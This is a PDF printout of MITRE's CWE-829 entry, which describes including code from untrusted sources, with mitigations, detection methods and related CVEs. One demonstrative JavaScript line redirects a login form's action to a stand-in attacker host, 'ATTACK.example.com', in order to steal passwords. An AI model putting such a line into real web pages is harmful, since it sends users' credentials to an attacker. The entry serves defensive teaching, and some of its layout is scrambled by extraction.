3/7/24, 3:11 PM CWE - CWE-829: Inclusion of Functionality from Untrusted Control Sphere (4.14)
https://cwe.mitre.org/data/deﬁnitions/829.html 1/5
Common W eakness Enumeration
A community-developed list of SW & HW weaknesses that can become
vulnerabilities
Home Search
CWE-829: Inclusion of Functionality from Untrusted Control Sphere
Weakness ID: 829
Vulnerability Mapping: 
View customized information:
 Description
The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended
control sphere.
 Extended Description
When including third-party functionality , such as a web widget, library , or other source of functionality , the product must ef fectively trust
that functionality . Without suf ficient protection mechanisms, the functionality could be malicious in nature (either by coming from an
untrusted source, being spoofed, or being modified in transit from a trusted source). The functionality might also contain its own
weaknesses, or grant access to additional functionality and state information that should be kept private to the base system, such as
system state information, sensitive application data, or the DOM of a web application.
This might lead to many dif ferent consequences depending on the included functionality , but some examples include injection of
malware, information exposure by granting excessive privileges or permissions to the untrusted functionality , DOM-based XSS
vulnerabilities, stealing user's cookies, or open redirect to malware ( CWE-601 ).
 Relationships
 Relevant to the view "Research Concepts" (CWE-1000)
Nature Type ID Name
ChildOf 669 Incorrect Resource Transfer Between Spheres
ParentOf 98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote
File Inclusion')
ParentOf 827 Improper Control of Document Type Definition
ParentOf 830 Inclusion of W eb Functionality from an Untrusted Source
 Relevant to the view "Software Development" (CWE-699)
Nature Type ID Name
MemberOf 1214 Data Integrity Issues
 Relevant to the view "W eaknesses for Simplified Mapping of Published V ulnerabilities" (CWE-1003)
 Relevant to the view "Architectural Concepts" (CWE-1008)
 Modes Of Introduction
Phase Note
Implementation REALIZA TION: This weakness is caused during implementation of an architectural security tactic.
 Common Consequences
Scope Impact Likelihood
Confidentiality
Integrity
AvailabilityTechnical Impact: Execute Unauthorized Code or Commands
An attacker could insert malicious functionality into the program by causing the program to download
code that the attacker has placed into the untrusted control sphere, such as a malicious web site.
 Demonstrative Examples
Example 1
This login webpage includes a weather widget from an external website:About ▼ CWE List ▼ Mapping ▼ Top-N Lists ▼ Community ▼ News ▼
ALLOWED
Abstraction: Base
Conceptual OperationalMapping
FriendlyComplete Custom
(bad code) Example Language: HTML 
 Welcome!
Please Login:

Username: 
  

Password: 
3/7/24, 3:11 PM CWE - CWE-829: Inclusion of Functionality from Untrusted Control Sphere (4.14)
https://cwe.mitre.org/data/deﬁnitions/829.html 2/5This webpage is now only as secure as the external domain it is including functionality from. If an attacker compromised the external
domain and could add malicious scripts to the weatherwidget.js file, the attacker would have complete control, as seen in any XSS
weakness ( CWE-79 ).
For example, user login information could easily be stolen with a single line added to weatherwidget.js:
This line of javascript changes the login form's original action target from the original website to an attack site. As a result, if a user
attempts to login their username and password will be sent directly to the attack site.
 Observed Examples
Reference Description
CVE-2010-2076 Product does not properly reject DTDs in SOAP messages, which allows remote attackers to read
arbitrary files, send HTTP requests to intranet servers, or cause a denial of service.
CVE-2004-0285 Modification of assumed-immutable configuration variable in include file allows file inclusion via direct
request.
CVE-2004-0030 Modification of assumed-immutable configuration variable in include file allows file inclusion via direct
request.
CVE-2004-0068 Modification of assumed-immutable configuration variable in include file allows file inclusion via direct
request.
CVE-2005-2157 Modification of assumed-immutable configuration variable in include file allows file inclusion via direct
request.
CVE-2005-2162 Modification of assumed-immutable configuration variable in include file allows file inclusion via direct
request.
CVE-2005-2198 Modification of assumed-immutable configuration variable in include file allows file inclusion via direct
request.
CVE-2004-0128 Modification of assumed-immutable variable in configuration script leads to file inclusion.
CVE-2005-1864 PHP file inclusion.
CVE-2005-1869 PHP file inclusion.
CVE-2005-1870 PHP file inclusion.
CVE-2005-2154 PHP local file inclusion.
CVE-2002-1704 PHP remote file include.
CVE-2002-1707 PHP remote file include.
CVE-2005-1964 PHP remote file include.
CVE-2005-1681 PHP remote file include.
CVE-2005-2086 PHP remote file include.
CVE-2004-0127 Directory traversal vulnerability in PHP include statement.
CVE-2005-1971 Directory traversal vulnerability in PHP include statement.
CVE-2005-3335 PHP file inclusion issue, both remote and local; local include uses ".." and "%00" characters as a
manipulation, but many remote file inclusion issues probably have this vector .
 Potential Mitigations
Phase: Architecture and Design
Strategy: Libraries or Frameworks
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness
easier to avoid.
Phase: Architecture and Design
Strategy: Enforcement by Conversion
When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input
values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI
AccessReferenceMap [ REF-45 ] provide this capability .
Phase: Architecture and Design
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in
order to avoid CWE-602 . Attackers can bypass the client-side checks by modifying values after the checks have been
performed, or by changing the client to remove the client-side checks entirely . Then, these modified values would be submitted
to the server .






(attack code) Example Language: JavaScript 
...Weather widget code....
document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php";3/7/24, 3:11 PM CWE - CWE-829: Inclusion of Functionality from Untrusted Control Sphere (4.14)
https://cwe.mitre.org/data/deﬁnitions/829.html 3/5Phases: Architecture and Design; Operation
Strategy: Sandbox or Jail
Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating
system. This may ef fectively restrict which files can be accessed in a particular directory or which commands can be executed
by the software.
OS-level examples include the Unix chroot jail, AppArmor , and SELinux. In general, managed code may provide some
protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file
operations.
This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be
subject to compromise.
Be careful to avoid CWE-243 and other weaknesses related to jails.
Effectiveness: Limited
Note: The ef fectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and
might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of
the file system that can be accessed.
Phases: Architecture and Design; Operation
Strategy: Environment Hardening
Run your code using the lowest privileges that are required to accomplish the necessary tasks [ REF-76 ]. If possible, create
isolated accounts with limited privileges that are only used for a single task. That way , a successful attack will not immediately
give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as
the database administrator , especially in day-to-day operations.
Phase: Implementation
Strategy: Input V alidation
Assume all input is malicious. Use an "accept known good" input validation strategy , i.e., use a list of acceptable inputs that
strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something
that does.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of
acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an
example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not
valid if the input is only expected to contain colors such as "red" or "blue."
Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input,
especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However ,
denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected
outright.
When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "."
character in the filename to avoid weaknesses such as CWE-23 , and exclude directory separators such as "/" to avoid CWE-36 .
Use a list of allowable file extensions, which will help to avoid CWE-434 .
Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist,
which may be incomplete ( CWE-184 ). For example, filtering "/" is insuf ficient protection if the filesystem also supports the use of
"\" as a directory separator . Another possible error could occur when the filtering is applied in a way that still produces dangerous
data ( CWE-182 ). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of
"../" would be removed from the original string, but the remaining characters would still form the "../" string.
Effectiveness: High
Phases: Architecture and Design; Operation
Strategy: Attack Surface Reduction
Store library , include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory
and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is
to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the
constant does not exist, then the file was directly requested, and it can exit immediately .
This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base
program but not in the include files. It will also reduce the attack surface.
Phases: Architecture and Design; Implementation
Strategy: Attack Surface Reduction
Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything
read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail,
files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be
obtained indirectly through API calls.
Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for
cookies and URL components.
Phase: Operation
Strategy: Firewall
Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot
be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software3/7/24, 3:11 PM CWE - CWE-829: Inclusion of Functionality from Untrusted Control Sphere (4.14)
https://cwe.mitre.org/data/deﬁnitions/829.html 4/5assurance measures are applied, or to provide defense in depth.
Effectiveness: Moderate
Note: An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass
the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those
inputs. Depending on functionality , an application firewall might inadvertently reject or modify legitimate requests. Finally , some
manual ef fort may be required for customization.
 Detection Methods
Automated Static Analysis - Binary or Bytecode
According to SOAR, the following detection techniques may be useful:
Cost ef fective for partial coverage:
Bytecode W eakness Analysis - including disassembler + source code weakness analysis
Effectiveness: SOAR Partial
Manual Static Analysis - Binary or Bytecode
According to SOAR, the following detection techniques may be useful:
Cost ef fective for partial coverage:
Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies
Effectiveness: SOAR Partial
Dynamic Analysis with Manual Results Interpretation
According to SOAR, the following detection techniques may be useful:
Cost ef fective for partial coverage:
Forced Path Execution
Monitored V irtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does
anything suspicious
Effectiveness: SOAR Partial
Manual Static Analysis - Source Code
According to SOAR, the following detection techniques may be useful:
Highly cost ef fective:
Manual Source Code Review (not inspections)
Cost ef fective for partial coverage:
Focused Manual Spotcheck - Focused manual analysis of source
Effectiveness: High
Automated Static Analysis - Source Code
According to SOAR, the following detection techniques may be useful:
Cost ef fective for partial coverage:
Source code W eakness Analyzer
Context-configured Source Code W eakness Analyzer
Effectiveness: SOAR Partial
Architecture or Design Review
According to SOAR, the following detection techniques may be useful:
Highly cost ef fective:
Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)
Formal Methods / Correct-By-Construction
Cost ef fective for partial coverage:
Attack Modeling
Effectiveness: High
 Memberships
Nature Type ID Name
MemberOf 813 OWASP Top Ten 2010 Category A4 - Insecure Direct Object References
3/7/24, 3:11 PM CWE - CWE-829: Inclusion of Functionality from Untrusted Control Sphere (4.14)
https://cwe.mitre.org/data/deﬁnitions/829.html 5/5MemberOf 864 2011 Top 25 - Insecure Interaction Between Components
MemberOf 884 CWE Cross-section
MemberOf 1354 OWASP Top Ten 2021 Category A08:2021 - Software and Data Integrity Failures
MemberOf 1364 ICS Communications: Zone Boundary Failures
MemberOf 1416 Comprehensive Categorization: Resource Lifecycle Management
 Vulnerability Mapping Notes
Usage: ALLOWED (this CWE ID could be used to map to real-world vulnerabilities)
Reason: Acceptable-Use
Rationale:
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of
vulnerabilities.
Comments:
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a
lower-level Base/V ariant simply to comply with this preferred level of abstraction.
 Related Attack Patterns
CAPEC-ID Attack Pattern Name
CAPEC-175 Code Inclusion
CAPEC-201 Serialized Data External Linking
CAPEC-228 DTD Injection
CAPEC-251 Local Code Inclusion
CAPEC-252 PHP Local File Inclusion
CAPEC-253 Remote Code Inclusion
CAPEC-263 Force Use of Corrupted Files
CAPEC-538 Open-Source Library Manipulation
CAPEC-549 Local Execution of Code
CAPEC-640 Inclusion of Code in Existing Process
CAPEC-660 Root/Jailbreak Detection Evasion via Hooking
CAPEC-695 Repo Jacking
CAPEC-698 Install Malicious Extension
 References
[REF-45] OW ASP. "OW ASP Enterprise Security API (ESAPI) Project". < http://www .owasp.org/index.php/ESAPI >.
[REF-76] Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14.
. URL
validated: 2023-04-07 .
 Content History
 Submissions
Submission Date Submitter Organization
2010-11-29
(CWE 1.11, 2010-12-13)CWE Content Team MITRE
 Modifications
